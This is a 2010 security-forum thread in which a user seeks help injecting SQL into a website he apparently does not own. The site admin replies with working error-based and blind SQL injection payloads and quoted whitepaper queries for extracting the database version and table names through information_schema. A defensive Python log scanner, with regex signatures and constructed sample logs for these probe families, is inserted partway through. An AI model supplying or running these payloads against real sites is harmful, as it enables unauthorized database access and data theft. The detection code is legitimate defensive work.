IT Security and Insecurity Portal

Help in SQL injection please
Posted: Mon Sep 06, 2010 1:48 am
pink_spider
Advanced user
Joined: Aug 28, 2010
Posts: 91
Code: http://www.site.com/index.php?id=2773+order+by+1,2,3,4,5,6--
It is OK,
but UNION fails:
Code: http://www.site.com/index.php?id=2773 UNION all SELECT 1,2,3,4,5,6--
The error is:
Code:
Erro ao executar a SQL!
mysql error: [1222: The used SELECT statements have a different number of columns] in EXECUTE(\"SELECT l.*, lo.*, DATE_FORMAT(l.licitacao_data_abertura,\'%d/%m/%Y\') as licitacao_data_abertura FROM swp_licitacoes l inner join swp_secoes lo on l.secoes_id = lo.secoes_id WHERE l.licitacao_id = 2773 UNION all SELECT version(),version(),version(),version(),version(),version()-- LIMIT 18446744073709551615\")

HELP ME PLEASE
Posted: Mon Sep 06, 2010 11:49 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
This situation is common: the vulnerable GET/POST parameter is used in multiple SQL queries with different column counts. So if you get the count right for the first SQL query, the second query will still fail.
My suggestion is error-based SQL injection:
Code:
http://www.site.com/index.php?id=2772%2b(IF(LENGTH(version())>1,(SELECT+1+UNION+ALL+SELECT+1),1))
Code:
http://www.site.com/index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1))
Some more useful information:
http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
Posted: Mon Sep 06, 2010 9:59 pm
pink_spider
Advanced user
Joined: Aug 28, 2010
Posts: 91
Very good! Thanks.
But my problems are not over!
I injected the second code and it worked! I think ¬ ¬
Code:
http://www.site.com//index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1))
But it does not show anything on the page!
It did not show the SQL version. It was indeed null.
How do I fix this problem?
And if it is not asking too much, I would like an explanation of the code I posted!
I thank you!
(Y)
Posted: Mon Sep 06, 2010 10:13 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
Did you get an error message like this:
Code:
Subquery returns more than 1 row
It's blind injection; you can retrieve information one bit at a time.
And you need special software for exploitation, because the manual way is too error-prone and too time-consuming.
If you know PHP, Perl, Ruby, Java or other programming languages, then it's not hard to write the needed script or program.
Or try the methods from the whitepaper suggested above; it may give you easier ways to exploitation.
Posted: Mon Sep 06, 2010 10:16 pm
pink_spider
Advanced user
Joined: Aug 28, 2010
Posts: 91
Can I post the website address that contains the vulnerability? Or is that prohibited by the forum?
Posted: Mon Sep 06, 2010 10:18 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
pink_spider wrote: Can I post the website address that contains the vulnerability? Or is that prohibited by the forum?
Nope, don't post sensitive information to this forum.
Posted: Mon Sep 06, 2010 10:23 pm
pink_spider
Advanced user
Joined: Aug 28, 2010
Posts: 91
OK!
Thanks anyway.
In two columns it gives an error when using ORDER BY,
in column No. 6 and No. 26.
I selected up to 500.
What happens then?
Posted: Mon Sep 06, 2010 10:29 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
Did you read the whitepaper I was suggesting?
http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
Code:
[ 2 ] ERROR-BASED BLIND SQL INJECTION IN MYSQL
At the turn of the last year, Qwazar got a universal technique for exploitation of Blind SQL Injection vulnerabilities in applications operating under the MySQL database from the depths of forum.antichat.ru (I wonder what else can be found in these depths). It should be mentioned that the proposed technique is rather complicated and opaque. Here is an example of applying this universal approach to MySQL>=5.0:
mysql> select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1
mysql> select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1
If the table name is unknown, which is possible for MySQL < 5.0, then one has to use more complex queries based on the function rand(). It means that we will often fail to obtain the necessary data with one HTTP query.
mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
...
1 row in set (0.00 sec)
...
mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
ERROR 1062 (23000): Duplicate entry '5.0.84:0' for key 1
Here is an example of practical use of the method for database structure restoration:
http://server/?id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
http://server/?id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
Analyze that information and do some local tests on your home computer before going online.
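An added detection-side example, not part of this thread or of the whitepaper it quotes: it scans constructed Common Log Format lines for the probe families that appear in waraxe's two replies above (ORDER BY column counting, UNION column matching, the IF(...) conditional subquery, and the floor(rand(0)*2) GROUP BY trick with information_schema reads) and groups the distinct families per client address. The log lines, addresses and signature names are constructed assumptions, not real data.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Probe families from this thread, as a defender looks for them in access logs:
# column-count probing, UNION column matching, the conditional-subquery error
# trick, and the floor(rand(0)*2) GROUP BY trick with information_schema reads.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "conditional_subquery": re.compile(r"\bif\s*\(.*\(\s*select\b.*\bunion\b", re.I | re.S),
    "rand_groupby_error": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "schema_read": re.compile(r"\binformation_schema\.", re.I),
}

# Common Log Format; only the fields used below are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Constructed sample lines modelled on the requests quoted in the thread (not real log data).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Sep/2010:01:40:01 +0000] "GET /index.php?id=2773+order+by+1,2,3,4,5,6-- HTTP/1.1" 200 5120',
    '203.0.113.5 - - [06/Sep/2010:01:41:17 +0000] "GET /index.php?id=2773+UNION+all+SELECT+1,2,3,4,5,6-- HTTP/1.1" 200 812',
    '203.0.113.5 - - [06/Sep/2010:11:52:03 +0000] "GET /index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1)) HTTP/1.1" 200 5120',
    '203.0.113.5 - - [06/Sep/2010:22:31:44 +0000] "GET /index.php?id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- HTTP/1.1" 200 790',
    '198.51.100.7 - - [06/Sep/2010:22:35:10 +0000] "GET /index.php?id=2773 HTTP/1.1" 200 5120',
]

def decode_params(target):
    """Query string -> dict; parse_qsl maps '+' to space and decodes %2b to a literal '+'."""
    return dict(parse_qsl(urlparse(target).query, keep_blank_values=True))

def classify(value):
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def scan_log(lines):
    """One finding per (request, parameter) that matches at least one signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, value in decode_params(m["target"]).items():
            tags = classify(value)
            if tags:
                findings.append({"ip": m["ip"], "ts": m["ts"], "param": param, "tags": tags})
    return findings

def per_source(findings):
    """Distinct probe families per client; several from one address is the escalation this thread shows."""
    out = {}
    for f in findings:
        out.setdefault(f["ip"], set()).update(f["tags"])
    return out
```

A single match is weak evidence on its own; the per-address set is what separates a column-count probe followed by UNION and error-based attempts from a one-off scanner hit.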
Posted: Mon Sep 06, 2010 10:37 pm
pink_spider
Advanced user
Joined: Aug 28, 2010
Posts: 91
OK!
Thank you!